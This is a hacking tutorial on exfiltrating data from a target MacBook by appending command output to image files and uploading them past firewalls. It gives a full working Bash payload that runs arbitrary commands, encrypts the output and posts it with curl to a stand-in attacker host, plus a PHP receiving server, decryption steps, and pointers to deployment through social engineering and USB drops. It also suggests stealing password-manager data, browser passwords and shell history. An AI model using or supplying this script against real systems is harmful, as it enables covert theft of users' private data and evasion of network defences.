Hacking macOS: How to Use Images to Smuggle Data Through Firewalls

Data can be injected into images quickly without the use of metadata tools. Attackers may use this knowledge to exfiltrate sensitive information from a MacBook by sending the pictures to ordinary file-sharing websites.

Continuing on the topics of DPI evasion, payload obfuscation, and utilizing popular websites to bypass firewalls, we'll be looking at an alternative way of embedding data into images. Unlike using metadata tags to store payloads inside a picture, this method involves injecting text directly into the footer of the image file.

Understanding the Attack

A simple Bash script was created for this article to demonstrate how an attacker can easily exfiltrate data inside images found on a target Mac computer. The script is below, and it's available on my GitHub as well.

#!/bin/bash

# `if` statement to detemine if the message is a 'response' one
# This is the command being executed and embedded in the photo.
# Single-quotes are used here to help with escaping special
# characters within the desired command(s).
exfilData='ls -lah "/Users/$USER/"'

# Where the attackers PHP server is located. This needs to be
# updated to use a public domain, like Dropbox or something
# with an official API.
exfilSite="http://attacker.com/index.php"

# If no suitable image is found on the target computer, this
# image will be downloaded and used instead. By default, the
# script tries to use an image already on the MacBook to
# minimize the amount of traffic originating the device.
tmpImage="https://support.apple.com/content/dam/edam/applecare/images/en_US/repair/psp-repair_2x.png"

# The `find` command used to locate a suitable image to embed
# data into. It will check the users home (~) directory for the
# first (-print -quit) JPG, JPEG, or PNG smaller than 100k.
# The filesize maximum and filetypes are somewhat arbitrary.
# The size can be increased and the filetypes can be expanded
# to use MP3, PDF, and MOV files, for example.
findImage="$(find ~ -type f -size -100k \( -iname '*.jp*g' -o -iname '*.png' \) -print -quit)"

# If the encryption option is enabled, the password is hardcoded
# into the payload for convenience, making it possible to
# reverse engineer and decrypt the exfiltrated data inside the
# image. This is a quick and dirty solution.
pass="password123"

# An `if` statement to detect if a suitable PNG or JPG was
# discovered. If not, it will download the backup image
# defined earlier in the script (tmpImage).
if [[ ! -f "$findImage" ]]; then
  # Curl will silently (-s) download the backup image and
  # save it (-o) into the /tmp directory with the i.jpg filename.
  curl -s "$tmpImage" -o "/tmp/i.jpg"
  # The backup image is set into the exfilImage variable for
  # later commands.
  exfilImage="/tmp/i.jpg"
else
  # If a suitable image is discovered, the exfilImage variable
  # is set for later commands.
  exfilImage="$findImage"
fi

# It may or may not be desirable to encrypt the payload output
# before embedding it into the image. Set to `1` to enable
# encryption, set to `0` to disable it.
useEncrypt='1'

# An `if` statement to determine the value of the exfilType
# variable. If `1` it will encrypt with openssl (LibreSSL).
# Otherwise, it will not encrypt.
if [[ "$useEncrypt" = '1' ]]; then
  # OpenSSL is used to encrypt (enc) the payload output
  # as well as encode (-a -A) the encrypted data with a
  # password (-pass).
  exfilData="$(openssl enc -aes-256-cbc -a -A -in <(eval $exfilData) -pass pass:$pass)"
else
  # If encryption isn't used, Bash will evaluable the variable
  # and execute it as a command.
  exfilData="$(eval $exfilData)"
fi

# Printf is used to embed the command output directly into
# image. It will append (>>) the data on a newline (\n\n).
# The newlines make it easy to quickly extract the data
# after it has been delivered to the attacker.
printf '\n\n%s' "$exfilData" >> "$exfilImage"

# Curl will exfiltrate the image to the attackers PHP
# server.
curl -F "image=@$exfilImage" "$exfilSite"

The script will first execute an arbitrary command (e.g., system_profiler). The output of that command is the data the attacker wishes to exfiltrate. The script will then attempt to locate a JPEG or PNG image in the target's home (~/) directory and inject the output of the command directly into the picture. The image is then immediately uploaded (smuggling the data) to any website the attacker desires.

• Don't Miss: Getting Started with Hacking macOS

Below is an example of a small image file opened with the nano text editor in Kali. We can see the image produces some unusual characters as photos aren't meant to be opened with text editors.

�PNG
^Z
^@^@^@
IHDR^@^@^D�^@^@^A^@^H^F^@^@^@�^Ebk^@^@^L^WiCCPICC Profile^@^@H��W^GXS�^V�[�     %�J     �A4�&%�H��FH^B  %�^T^T�
Wp-��`Y�U^Q^E�^B�Z�`a��-���ł
�7      ���}����o2?���?3瞹�^L^@�j�T��j^CP Q�^R^cXi�^Y,R^O@^A^E��(`��˥���(^@������5����N*��|�_��@(�^C��A�%��^K �^K^@6�/�)^@ �A��T�T�� f$
��_c��N^U�"^RT#�ۍ��H^Uր��$+&v��B,P�U��"eD2�t^@P�/^O�^Xƺ^B^H�^P^GeI�cT��^Nb�lq^XwH^GM^P+�I_�Byh"İr�I�^d�X�$[^V�^Y���d��L�˔yɜa��"!W�O�xG$
ł^R@��DS^\`w����t':��B7�6`�X'v^Pk^AAPa(/y0^[���B��gw�7����7^C�^PNS��+�PZ,^S��^T,^N��    Y\      ^?�(�^K��^[^@�7th���W^?^[^Q���6^E�k�?�$
f���^T���`^U�^A^[�&�
�^D�A^K8^@����,�^@��۠^K��g�^OV�^@� $��0^P#�^\�F^\^Q^W�^K�GB�($^AIG2�^\D�(�^Y�|�^\�@j��H=�^K�^_9��F."7�n� �
��b(^Ue���

Scrolling down to the very bottom of the same file, we'll find what appears to be the output of some ls and system_profiler commands.

�^D^^�'�?^?~���P��"�f��"c�5h^@w衇F�^K��x2VS�L�P$]^D����{h�����uL^f��ia������0pݺuqg^Ha�Gg��@�G�^^����<9f^W����^O?�kH��"UC��<������f^?]^N^X0 d�"g^WZ�ǽt���?���twu�G|.��yM~�k7�C^N9$e�������?nܸ^Bg^WL���^P�^L^S��7�IW�^F�V��{�^]w�ʸ~�+W��ˤ^F��N;�����ɐW��ץ�Vg^_-,,^L�l��2�~�v����P.b�$
�Xr�^U^U^U��D���l�^Z�J^W��T����<�^D�a����g�c˝s�9[$�s�~��i(;gΜ�L(���^[kL�)o6m:���ܶ'��u�~��%G^\q�]��mk��իW�F�^^�E�kM^O^Z��[�����^Z���d�f6J��
�4a3^B^H �^@^B^H �^@^B^H ��v" èU��^E-�Z).       ��'�#I�X��jZ']F�^?�����^?����+���ꩧ��+��'T0ǹ��^[k$��|���^[������v
 ^��m�^V�i;�v��'n�9sf��Ǯ\�m�����⋷�^Ep�=۵�6�Kڥ\�s���Ž�^_���������֦f����qL;9N���B{�        'l^�dI�>Gsު����1�0f̘JS�g�a�8�Z}��V'ݐv��6�����^Epz�O>�$1y������'��:��TbV9���������t�\
�uVd����Pf�MH^X\{�q�m�e^@��*x�^@^B^H �^@^B^H �^@^B^H �@�^E���3���)��sϐt1^L�,����j��EK�5��^{��K�^N�.�I�����<^]+^Z�^F�^[��'�3yJ^ELB�!n�@�^N��F���^\\F�8Dqq�5+�tU^Nj7aG&^W���:��s]���g�]k�xA�^UW��Jp��y���X^&�h� ����\*���t�^F��~����k�{�-��H@/��m� J��g�'^D^P@^@^A^D^P@^@^A^D^P@��^$
�B �{.��^P.��^\^K^A^D^P@^@^A^D^P@^@^A^D^P��^EZ^S�ك�o�^L�^A^B^Ht^F�^G^^x�N�:ýr�^H �^@^B^H �^@^B^H �^@^B;�@�c��8�ʝ �^@^B^H �^@^B^H �^@^B^H �^@^B^H �>^B�p���Y^Q@^@^A^D^P@^@^A^D^P@^@^A^D^P@^@^A^D:�^@!\'z��*^B^H �^@^B^H �^@^B^H �^@^B^H �@�^H^Pµ�;gE^@^A^D^P@^@^A^D^P@^@^A^D^P@^@^$
�#�^@^B^H �^@^B^H �^@^B^H �^@^B^H �Q����
���g�@�nݬ�֯_^_X�bE@�E"^Q�H�p6^Eo^P@^@^A^D^P@^@^A^D^P@^@^A^D^P@^@^A^D^P�&��oZ�6dȐ���{����^e^K��8���^Wc�ys�^U^B^H �^@^B^H �^@^B^H �^@^B^H �^@^B��vA�ӧOJ^@g6j^E�n�6�E^Hg$X"�^@^B^H �^@^B^H �^@^B^H �^@^B^H �Q@+���-�K���q��
!\6)�#�^@^B^H �^@^B^H �^@^B^H �^@^B^H �E �L�V����UUۘ^W!��`�^@^B^H �^@^B^H �^@^B^H �^@^B^H �@^[   ^Pµ^Q,�E^@^A^D^P@^@^A^D^P@^@^A^D^P@^@^A^D^P@�^H^P�^Y    �^H �^@^B^H �^@^B^H �^@^B^H �^@^B^H��^@!\^[�rX^D^P@^@^A^D^P@^@^A^D^P@^@^A^D^P@^@^A^D�^@!��`�^@^B^H �^@^B^H �^@^B^H �^@^B^$
�b���1/^S�m[c��D^@^A^D^P@^@^A^D^P@^@^A^D^P@^@^A^D^P@^@^AW�P(^Tذa��6]�~����1/
��J*^W6+X"�^@^B^H �^@^B^H �^@^B^H �^@^B^H �@�^B�p8�r�J�j8���m�F_�dr��p���PW�B^@^A^D^P@^@^A^D^P@^@^A^D^P@^@^A^D^P@^@��^E��Mö�^K^W^F֮]^[������u�n3�pR^@7/�H$f����*�� ���S�^B^A^D^P@^@^A^D^P@^@^A^D^P@^@^A^D^P@^@^A^D��h ^^�^G�/_^^x��w,^P
 ^BN�9^3B����뺣$���_B�'^]�x�^@^B^H �^@^B^H �^@^B^H �^@^B^H �@�^W� {Qmmj
�^T�Y�[$^R      ��^Fp�μ�+��s�̙�^]S�^_^?��u=z�X!
F��C寻i�^R^A^D^P@^@^A^D^P@^@^A^D^P@^@^A^D^P@^@^A^DZ$�V·yR��Ϲs�>*{&�^O@��q�2��^@^@^@^@IEND�B`�

total 80
drwx------+ 19 user  staff   608B May  3 02:22 Desktop
drwxr-xr-x+ 17 user  staff   544B May  3 01:00 .
-rw-------   1 user  staff    55B May  3 01:00 .lesshst
drwx------  59 user  staff   1.8K May  2 23:48 .bash_sessions
-rw-------   1 user  staff    23K May  2 22:17 .bash_history
-rw-r--r--@  1 user  staff   8.0K May  2 22:11 .DS_Store
drwx------   7 user  staff   224B Apr 28 06:46 .Trash
drwx------+ 33 user  staff   1.0K Apr 26 21:33 Documents
drwx------@ 55 user  staff   1.7K Apr 25 06:58 Library
drwxr-xr-x  15 user  staff   480B Nov 18 11:36 .atom
drwx------+  4 user  staff   128B Nov 18 06:32 Downloads
drwx------   3 user  staff    96B Nov 18 05:51 .config
drwx------+  3 user  staff    96B Oct 29  2018 Movies
drwx------+  3 user  staff    96B Oct 29  2018 Music
drwx------+  3 user  staff    96B Oct 29  2018 Pictures
drwxr-xr-x+  4 user  staff   128B Oct 29  2018 Public
drwxr-xr-x   5 root  admin   160B Oct 29  2018 ..

Firewall:

    Firewall Settings:

      Mode: Allow all incoming connections
      Firewall Logging: Yes
      Stealth Mode: No

The technical details for how images can retain data is a bit beyond the scope of this article. What's important is the data found at the bottom of the picture doesn't corrupt the photo. Image viewers like Apple's Preview will continue to open the image without detecting data in the file. It also makes images an excellent transport mechanism for data exfiltration.

• Don't Miss: Bypass MacOS's Elevated Privileges Prompt

The script accomplishes the injection of data into the image file using I/O redirection. In the very same way it's possible to append (>>) data to a text file, the script will add the command output into the bottom of the image file.

Why Exfiltrate Data Inside Images?

The primary benefit of exfiltrating data this way is firewall evasion. With network-based firewall solutions, it's possible to observe every packet leaving a particular device on the network. Strict firewall policies make it difficult for an attacker to get large quantities of information out of the network. Smuggling data inside images helps solve this obstacle.

Understanding the Payload

Let's break down the script, line by line.

It starts with several variables that should be changed appropriately to fit the scenario. The first variable will determine which command(s) get executed on the target MacBook. The output of the command is embedded in the image file. The below example executes a simple ls command of the target's home directory. Single-quotes are used for this variable to help with escaping characters. Be mindful of this when coming up with commands to execute.

exfilData='ls -lah "/Users/$USER/"'

There are many places the image can be exfiltrated to. With websites like Dropbox and Flickr, official APIs exist to make file uploading as convenient as possible for an end-user (and the attacker). Similarly, curl can emulate POST requests, sending the image to file-sharing websites and other forums. For this demonstration, we'll use a simple PHP server setup on the attacker's system.

exfilSite="http://attacker.com/index.php"

As we'll see later in the script, it attempts to enumerate a viable image to save the output data into. However, if none are discovered, the script will download the below image, using it to smuggle the output data instead. The below URL links to a random image on one of Apple's domains, but can be literally any JPEG or PNG on the internet.

tmpImage="https://support.apple.com/content/dam/edam/applecare/images/en_US/repair/psp-repair_2x.png"

The script will try to find an image file (-type f) less than 100k and containing the JPEG, JPG, or PNG file extension. It will use the first (-print -quit) image within this criteria as the exfiltration file. The file size requirements are mostly arbitrary. Smaller image files will make the uploading process quicker. These find options mainly were featured to show how refining the criteria can be done.

findImage="$(find ~ -type f -size -100k \( -iname '*.jp*g' -o -iname '*.png' \) -print -quit)"

The script supports the ability to encrypt the command output data before it's embedded into the image. Enable it with 1, disable it with 0.

useEncrypt='1'

With encryption enabled, the below password is used to password-protect the output data. It's hardcoded into the payload for convenience, which can make it possible to reverse engineer and decrypt the exfiltrated data inside the image but is meant to act as a quick and dirty solution. Public-key_cryptography would make more sense here.

pass="password123"

The remainder of the script doesn't need to be modified. All of the above variables are hardcoded into the below sections.

Below is the first of two if statements, which will determine whether or not a suitable JPEG or PNG file was detected and either use it in the following commands or download the Apple image defined in the "tmpImage" variable.

if [[ ! -f "$findImage" ]]; then
  curl -s "$tmpImage" -o "/tmp/i.jpg"
  exfilImage="/tmp/i.jpg"
else
  exfilImage="$findImage"
fi

The second if statement uses OpenSSL (LibreSSL in macOS or Mac OS X) to encrypt the output data with the $pass variable password. Otherwise, it will not encrypt and inject the output data into the image in plaintext.

if [[ "$useEncrypt" = '1' ]]; then
  exfilData="$(openssl enc -aes-256-cbc -a -A -in <(eval $exfilData) -pass pass:$pass)"
else
  exfilData="$(eval $exfilData)"
fi

Here, we have the I/O redirection. Printf is used in append (>>) the command output into the image file. Newlines (\n\n) are added to separate the injected data from the raw image data, making it easier to extract in following commands.

printf '\n\n%s' "$exfilData" >> "$exfilImage"

Finally, the image is exfiltrated to the attacker's server using curl with the -F option to send the image.

curl -F "image=@$exfilImage" "$exfilSite"

Step 1: Start the PHP Server

The example used earlier in this article utilizes File.io to store the exfiltrated image(s). While similar file-sharing websites are ideal for this attack, I'll quickly show how to use a local PHP server in Kali to intercept images.

Much like preparing a server for screenshot exfiltration, PHP is used to intercept images coming from the target's MacBook. It's covered in depth in that guide, so be sure to reference that for the setup details.

• More Info: Automate Screenshot Exfiltration from a Backdoored MacBook

Save the below PHP code to a file called "index.php" and start the server with php -S 0.0.0.0:80.

<?php
    $file = date("dHis") . ".png";
    move_uploaded_file($_FILES['image']['tmp_name'], $file);
?>

Step 2: Deploy the Payload

There are several ways of getting a Mac user to execute some nefarious code. The simplest method for compromising a target involves social engineering them into opening trojanized AppleScripts. That can be accomplished by performing USB dead drop attacks, which macOS is highly susceptible to, or remotely bypassing Gatekeeper.

For more on the subject of USB dead drops, check out our article on hacking Wi-Fi passwords using USB dead drops. It focuses on compromising Windows 10 targets but talks in-depth about using USB flash drives as attack vectors.

• More Info: Hack WPA2 Wi-Fi Passwords Using Jedi Mind Tricks

Step 3: Access the Exfiltrated Data

After the PHP server receives the exfiltrated image, extract the embedded data. If encryption is disabled in the payload, the exfiltrated data is easily extracted using the tail command. Change the number (-n) of lines to print as needed.

~$ tail -n 20 image.png

1   ���g�@�nݬ�֯_X�bE@�E"�H�p6o@@@@�&��oZ�6dȐ���{����

��J*6+X"    �@��p8�r�J�j8���m�F_�dr��p��PW�B@@@@����Mö�     ��!\rX@@@@�!��`    �@   ,�E@@@@�        ��!\rX@@@@�!��`    �@   ,�E@@@�q��`���1�
F��C寻i�@@@@Z$�V·yR��Ϲs�>*{&�@��q�2��IEND�B`�          ]����u�n3�pR7/�H$f���*�� ���S�@@@@��h ��/_x�w,

     2  total 80
     3  drwx------+ 19 user  staff   608B May  3 02:22 Desktop
     4  drwxr-xr-x+ 17 user  staff   544B May  3 01:00 .
     5  -rw-------   1 user  staff    55B May  3 01:00 .lesshst
     6  drwx------  59 user  staff   1.8K May  2 23:48 .bash_sessions
     7  -rw-------   1 user  staff    23K May  2 22:17 .bash_history
     8  -rw-r--r--@  1 user  staff   8.0K May  2 22:11 .DS_Store
     9  drwx------   7 user  staff   224B Apr 28 06:46 .Trash
    10  drwx------+ 33 user  staff   1.0K Apr 26 21:33 Documents
    11  drwx------@ 55 user  staff   1.7K Apr 25 06:58 Library
    12  drwxr-xr-x  15 user  staff   480B Nov 18 11:36 .atom
    13  drwx------+  4 user  staff   128B Nov 18 06:32 Downloads
    14  drwx------   3 user  staff    96B Nov 18 05:51 .config
    15  drwx------+  3 user  staff    96B Oct 29  2018 Movies
    16  drwx------+  3 user  staff    96B Oct 29  2018 Music
    17  drwx------+  3 user  staff    96B Oct 29  2018 Pictures
    18  drwxr-xr-x+  4 user  staff   128B Oct 29  2018 Public
    19  drwxr-xr-x   5 root  admin   160B Oct 29  2018 ..

If encryption is enabled, OpenSSL (LibreSSL) must be installed in Kali to decrypt the data. Be sure to install LibreSSL version 2.8.2. In my test, version 2.9.x didn't seem to be compatible with Mojave's version of LibreSSL; the data wouldn't decrypt. However, you may have luck using LibreSSL version 3.0 or newer for data taken from Mojave, Catalina, and maybe even Big Sur, but from what I can tell, they all use older versions of LibreSSL, so 2.8.2 is a good choice.

In Kali, start by downloading the LibreSSL tarball.

~$ wget 'https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-2.8.2.tar.gz'

--2019-04-28 21:08:46--  https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-2.8.2.tar.gz
Resolving ftp.openbsd.org (ftp.openbsd.org)... 129.128.5.191
Connecting to ftp.openbsd.org (ftp.openbsd.org)|129.128.5.191|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3373599 (3.2M) [text/plain]
Saving to: ‘libressl-2.8.2.tar.gz’

libressl-2.8.2.tar.gz             100%[==============>]   3.22M   255KB/s    in 25s

2019-04-28 21:09:15 (133 KB/s) - ‘libressl-2.8.2.tar.gz’ saved [3373599/3373599]

Decompress it with the following tar command to extract (x) the .gz (z) file (f).

~$ tar -xzf libressl-*.tar.gz

libressl-2.8.2/m4/check-hardening-options.m4
libressl-2.8.2/m4/check-libc.m4
libressl-2.8.2/m4/check-os-options.m4
libressl-2.8.2/m4/disable-compiler-warnings.m4
libressl-2.8.2/m4/libtool.m4

...

libressl-2.8.2/man/tls_load_file.3
libressl-2.8.2/man/tls_ocsp_process_response.3
libressl-2.8.2/man/tls_read.3
libressl-2.8.2/man/openssl.cnf.5
libressl-2.8.2/man/x509v3.cnf.5
libressl-2.8.2/man/Makefile.in
libressl-2.8.2/man/CMakeLists.txt

When that's done, change (cd) into the new libressl-*/ directory.

~$ cd libressl-*/

Use the ./configure command to ensure everything is ready to build the application. It will take a few minutes to complete.

~$ ./configure && make

checking build system type... x86_64-pc-linux-gnu
checking host system type... x86_64-pc-linux-gnu
checking for a BSD-compatible install... /usr/bin/install -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... /usr/bin/mkdir -p

...

make[1]: Entering directory '/opt/libressl-2.8.2/man'
make[1]: Nothing to be done for 'all'.
make[1]: Leaving directory '/opt/libressl-2.8.2/man'
make[1]: Entering directory '/opt/libressl-2.8.2'
make[1]: Nothing to be done for 'all-am'.
make[1]: Leaving directory '/opt/libressl-2.8.2'

Then, use make install to install the necessary software into the appropriate system directories.

~$ make install

make install
Making install in crypto
make[1]: Entering directory '/opt/libressl-2.8.2/crypto'
make  install-am
make[2]: Entering directory '/opt/libressl-2.8.2/crypto'

...

make[2]: Nothing to be done for 'install-exec-am'.
 /usr/bin/mkdir -p '/usr/local/lib/pkgconfig'
 /usr/bin/install -c -m 644 libcrypto.pc libssl.pc libtls.pc openssl.pc '/usr/local/lib/pkgconfig'
make[2]: Leaving directory '/opt/libressl-2.8.2'
make[1]: Leaving directory '/opt/libressl-2.8.2'

Finally, use the ldconfig command to create the necessary links and cache to the most recent shared libraries.

~$ ldconfig

To verify the installation was successful, use the whereis command to find the openssl binaries.

~$ whereis openssl

openssl: /usr/bin/openssl /usr/local/bin/openssl /usr/share/man/man1/openssl.1ssl.gz

The binary in /usr/local/bin/ is the newest version and can be verified using the below openssl command.

~$ /usr/local/bin/openssl version

LibreSSL 2.8.2

With the installation taken care of, data in the image is extractable and decrypted using the below command.

~$ /usr/local/bin/openssl enc -d -aes-256-cbc -a -A -pass pass:password123 -in <(tail -n1 image.png)

total 80
drwx------+ 19 user  staff   608B May  3 02:22 Desktop
drwxr-xr-x+ 17 user  staff   544B May  3 01:00 .
-rw-------   1 user  staff    55B May  3 01:00 .lesshst
drwx------  59 user  staff   1.8K May  2 23:48 .bash_sessions
-rw-------   1 user  staff    23K May  2 22:17 .bash_history
-rw-r--r--@  1 user  staff   8.0K May  2 22:11 .DS_Store
drwx------   7 user  staff   224B Apr 28 06:46 .Trash
drwx------+ 33 user  staff   1.0K Apr 26 21:33 Documents
drwx------@ 55 user  staff   1.7K Apr 25 06:58 Library
drwxr-xr-x  15 user  staff   480B Nov 18 11:36 .atom
drwx------+  4 user  staff   128B Nov 18 06:32 Downloads
drwx------   3 user  staff    96B Nov 18 05:51 .config
drwx------+  3 user  staff    96B Oct 29  2018 Movies
drwx------+  3 user  staff    96B Oct 29  2018 Music
drwx------+  3 user  staff    96B Oct 29  2018 Pictures
drwxr-xr-x+  4 user  staff   128B Oct 29  2018 Public
drwxr-xr-x   5 root  admin   160B Oct 29  2018 ..

The payload (ls) used in this article is a simple example. In a real scenario, an attacker may design the script to locate and exfiltrate LastPass and 1Passwords data for offline brute-force attackers. Other exfiltration attacks may involve cached browser passwords, Terminal history, web traffic, and any data the attacker deems worthy of stealing.

For questions and concerns, leave a comment below or perform open-source intelligence gathering to locate my email address. If all else fails, message me on Twitter @tokyoneon_.